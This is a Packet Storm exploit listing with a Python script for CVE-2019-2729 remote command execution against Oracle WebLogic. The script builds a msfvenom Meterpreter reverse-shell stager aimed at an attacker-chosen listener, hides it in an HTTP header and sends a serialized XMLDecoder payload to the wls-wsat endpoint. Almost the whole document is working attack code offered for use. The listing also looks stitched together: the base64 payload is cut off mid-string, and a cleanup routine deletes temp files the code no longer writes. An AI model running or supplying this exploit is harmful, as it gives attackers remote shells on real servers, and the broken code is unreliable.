Oracle Weblogic 10.3.6.0.0 Remote Command Execution

2020-01-09T00:00:00
ID PACKETSTORM:155886
Type packetstorm
Reporter Paveway3
Modified 2020-01-09T00:00:00

Description

                                        
                                            `# Exploit Title: Oracle Weblogic 10.3.6.0.0 - Remote Command Execution  
# Date: 2020-01-08  
# Exploit Author: Waffles & Paveway3  
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html  
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0  
# Tested on: Windows  
# CVE : CVE-2019-2729  
  
SerialLogic.py  
  
# Exploit Title: SerialLogic  
# Date: 01-08-2020  
# Exploit Author: Waffles & Paveway3  
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html  
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0  
# Tested on: Windows  
# CVE : CVE-2019-2729  
  
import argparse
import base64
import os
import subprocess
import sys

import requests
  
# ANSI SGR escape sequences for coloured terminal output.
class bcolors:
    """ANSI escape codes used to colour status lines.

    Wrap a message as ``bcolors.OKGREEN + msg + bcolors.ENDLINE``;
    ENDLINE resets all attributes so later output is unaffected.
    """

    ENDLINE = '\033[0m'    # reset
    BOLD = '\033[1m'       # bold / bright
    UNDERLINE = '\033[4m'  # underline
    NONERED = '\033[91m'   # bright red
    OKGREEN = '\033[92m'   # bright green
  
# Startup banner, printed as soon as the module is executed.  The ASCII art
# appears to have lost its column alignment in this listing; it is kept as-is.
# NOTE(review): the literal contains backslash escapes such as "\ " that newer
# interpreters warn about as invalid escape sequences; a raw string (r"""...""")
# would avoid that without changing the printed text.
banner = """\n  
_______ ________ ___ ____ _______ ___ ________ ____   
/ ____/ | / / ____/ |__ \ / __ < / __ \ |__ \/__ /__ \/ __ \  
/ / | | / / __/________/ // / / / / /_/ /_______/ / / /__/ / /_/ /  
/ /___ | |/ / /__/_____/ __// /_/ / /\__, /_____/ __/ / // __/\__, /   
\____/ |___/_____/ /____/\____/_//____/ /____/ /_//____/____/   
"""

print(banner)
  
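def _port(value: str) -> int:
    """argparse ``type``: accept only a TCP port number in 1..65535.

    The port values end up in a URL and in the msfvenom ``LPORT=`` argument,
    so rejecting garbage here gives a clear error instead of a malformed
    request or a failed payload build later on.
    """
    try:
        port = int(value)
    except ValueError:
        raise argparse.ArgumentTypeError("port must be an integer: %r" % value) from None
    if not 1 <= port <= 65535:
        raise argparse.ArgumentTypeError("port out of range 1-65535: %d" % port)
    return port


def build_parser() -> argparse.ArgumentParser:
    """Return the command-line parser for SerialLogic.

    Exactly one of ``-cs`` / ``-msf`` is expected; that rule is enforced
    after parsing (by the payload-generation step), not by argparse, so the
    original user-facing message is preserved.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-cs', dest='cobaltstrike', default=False, required=False,
                        help="Use Cobalt Strike as callback", action='store_true')
    parser.add_argument('-msf', dest='metasploit', default=False, required=False,
                        help="Use Metasploit Handler as callback", action='store_true')
    parser.add_argument('-rhost', dest='target_host', required=True, help="Target Host")
    parser.add_argument('-rport', dest='target_port', type=_port, required=True, help="Target Port")
    parser.add_argument('-lhost', dest='listen_host', required=True, help="Listening host IP for callback")
    parser.add_argument('-lport', dest='listen_port', type=_port, required=True, help="Listening port for callback")
    parser.add_argument('-ssl', dest='usessl', default=False, required=False,
                        help="Use HTTPS instead of HTTP", action='store_true')
    return parser


parser = build_parser()
args = parser.parse_args()

print("\n")

# store_true options are already bool; the former str()/'True' round-trip
# was redundant.  Ports are validated as ints above but the rest of the
# script builds strings from them, so they are kept as str here.
cobaltstrike = bool(args.cobaltstrike)
metasploit = bool(args.metasploit)
usessl = bool(args.usessl)
target_host = str(args.target_host)
target_port = str(args.target_port)
listen_host = str(args.listen_host)
listen_port = str(args.listen_port)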
  
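def _generate_stager(payload: str, lhost: str, lport: str) -> str:
    """Build a ``psh-cmd`` stager with msfvenom and return it as one line.

    ``payload`` is the msfvenom payload name; ``lhost``/``lport`` identify the
    callback listener.  msfvenom is invoked with an argument list (no shell),
    so a crafted ``-lhost``/``-lport`` value cannot inject extra shell commands,
    and the stager is read from stdout instead of being written to a fixed,
    predictable file under /tmp.  Exits with status 1 if msfvenom is missing
    or does not produce a payload.
    """
    cmd = ["msfvenom", "-p", payload, "LHOST=" + lhost, "LPORT=" + lport, "-f", "psh-cmd"]
    try:
        # msfvenom prints the payload on stdout and its progress chatter on
        # stderr; the original redirected both to /dev/null and used -o.
        proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL, check=False)
    except FileNotFoundError:
        print(bcolors.NONERED + "[-] msfvenom not found in PATH" + bcolors.ENDLINE)
        sys.exit(1)
    # Defensive strip(): the one-liner becomes an HTTP header value, and
    # requests rejects header values that contain a newline.
    stager = proc.stdout.decode("utf-8", errors="replace").strip()
    if proc.returncode != 0 or not stager:
        print(bcolors.NONERED + "[-] msfvenom failed (exit code " + str(proc.returncode)
              + "); no payload generated" + bcolors.ENDLINE)
        sys.exit(1)
    return stager


if metasploit and not cobaltstrike:
    the_cmd = _generate_stager("windows/meterpreter/reverse_tcp", listen_host, listen_port)
elif cobaltstrike and not metasploit:
    # NOTE(review): -cs still produces a Metasploit reverse_http stager; it only
    # reaches Cobalt Strike if the listener speaks the MSF staging protocol.
    # Confirm the listener type before relying on this path.
    the_cmd = _generate_stager("windows/meterpreter/reverse_http", listen_host, listen_port)
else:
    print("Please try with ONE of the payload options.")
    sys.exit()

headers = {
    'Content-Type': 'text/xml',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0',
    'SOAPAction': '',
    # Presumably read back by the deserialized object on the server and run as
    # the command; the decoded blob is not readable here, so verify if changed.
    'lfcmd': the_cmd,
}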
  
# SOAP envelope prefix.  The WorkContext header carries a <java> XMLDecoder
# document; <array method="forName"><string>oracle.toplink...UnitOfWorkChangeSet</string>
# names the class that presumably receives the byte array that follows (the
# prefix ends on an open <void> that the decoded blob completes).
# NOTE(review): the base64 blob assigned to yss_payload on the following lines
# is truncated in this listing (no closing quote); obtain the complete script
# before running it.
data_pref = '<?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <array method="forName"> <string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string> <void>'
yss_payload = "CjxhcnJheSBjbGFzcz0iYnl0ZSIgbGVuZ3RoPSI2ODYyIj48dm9pZCBpbmRleD0iMTYwMSI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTM4MSI+PGJ5dGU+NjQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODkzIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjEyMzUiPjxieXRlPjk5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTE1Ij48Ynl0ZT4xMDg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMDkyIj48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyNjE5Ij48Ynl0ZT42NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIwOTEiPjxieXRlPjcyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjM1NCI+PGJ5dGU+MTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTY0Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNTc4Ij48Ynl0ZT4xMDQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI4OTciPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE2MjUiPjxieXRlPjEyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjY0MSI+PGJ5dGU+NzI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MjYyIj48Ynl0ZT40NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM3MCI+PGJ5dGU+MTA1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjIxNiI+PGJ5dGU+NzQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MTQ3Ij48Ynl0ZT4xMTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMjU1Ij48Ynl0ZT4xMDk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDQiPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE0ODQiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDEwOCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNjQyIj48Ynl0ZT4xMTE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MzE4Ij48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NjUyIj48Ynl0ZT4yMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjYzMjQiPjxieXRlPjI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0OTY1Ij48Ynl0ZT4xMDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MTcxIj48Ynl0ZT40OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2NTIiPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTc4MyI+PGJ5dGU+MTA5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjc2NiI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTU5NCI+PGJ5dGU+MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9Ijk0MiI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDc4NiI+PGJ5dGU+NzY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMzU5Ij48Ynl0ZT4xMTk8L2J5dGU+PC92b2lkPjx2b2lkIGluZ
GV4PSI1MzQxIj48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE3NTkiPjxieXRlPjExODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxNDgiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUyNjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjU0MzIiPjxieXRlPjExNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIxMzkiPjxieXRlPjEwNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2Ij48Ynl0ZT4tMzU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTQ4Ij48Ynl0ZT44MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ3ODgiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTU0MSI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1ODgxIj48Ynl0ZT40PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTk0NyI+PGJ5dGU+LTc0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTIzNSI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTQ0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMzNjEiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI5NDciPjxieXRlPjg3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjQwOCI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjE4MyI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTMyMCI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxODEzIj48Ynl0ZT4xMDM8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODA4Ij48Ynl0ZT4xMTI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDMiPjxieXRlPjgzPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDI4NiI+PGJ5dGU+MTE1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTY4OSI+PGJ5dGU+NDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTgwIj48Ynl0ZT42OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxMjEiPjxieXRlPjQ4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzEwMCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MTQyIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUzNyI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNDE3Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0NDk4Ij48Ynl0ZT41OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE5MzciPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjk4NSI+PGJ5dGU+MTA0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTUwMCI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTQ0NyI+PGJ5dGU+NTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzMzA0Ij48Y
nl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUwOTciPjxieXRlPjczPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRl  
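def _build_attack_url(host: str, port: str, use_ssl: bool) -> str:
    """Return the wls-wsat CoordinatorPortType endpoint URL for ``host:port``."""
    scheme = "https" if use_ssl else "http"
    return "%s://%s:%s/wls-wsat/CoordinatorPortType" % (scheme, host, port)


def _cleanup_stager_files() -> None:
    """Delete the msfvenom output files under /tmp, whichever of them exist.

    The stager embeds the listener address, so it must not be left on disk
    even when the request fails; this runs from a ``finally`` for that reason.
    """
    for path in ("/tmp/CVE_2019_2729_MSF.txt", "/tmp/CVE_2019_2729_CS.txt"):
        if os.path.exists(path):
            os.remove(path)


# yss_payload decodes to an XML <array class="byte" length="6862"> element;
# glue it onto the SOAP/WorkContext prefix to form the full request body.
data = base64.b64decode(yss_payload)
data_payload = data_pref + data.decode()
attackurl = _build_attack_url(target_host, target_port, usessl)

# Only one of the two flags survives the earlier check, so this is exhaustive.
cmd_exec = "Cobalt Strike" if cobaltstrike and not metasploit else "Metasploit"

try:
    # verify is left at the requests default (True): an HTTPS target with a
    # self-signed certificate raises SSLError, which is now reported instead
    # of becoming an unhandled traceback.  timeout keeps a hung target from
    # stalling the script indefinitely.
    res = requests.post(attackurl, headers=headers, data=data_payload, timeout=10)
except requests.RequestException as exc:
    print(bcolors.NONERED + "[-] Request to " + attackurl + " failed: " + str(exc) + bcolors.ENDLINE)
    sys.exit(1)
else:
    # The script cannot observe execution on the target; all it has is the
    # HTTP status.  A 404 means the endpoint is absent, so the payload never
    # reached wls-wsat and the success message would be misleading.
    print("[*] Target responded with HTTP " + str(res.status_code))
    if res.status_code == 404:
        print(bcolors.NONERED + "[-] /wls-wsat/CoordinatorPortType not found; payload did not reach the service" + bcolors.ENDLINE)
    else:
        print(bcolors.OKGREEN + "[+] Command executed was a " + cmd_exec + " Payload, please check your console" + bcolors.ENDLINE)
finally:
    print(bcolors.OKGREEN + "[+] Cleaning up...." + bcolors.ENDLINE)
    _cleanup_stager_files()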
`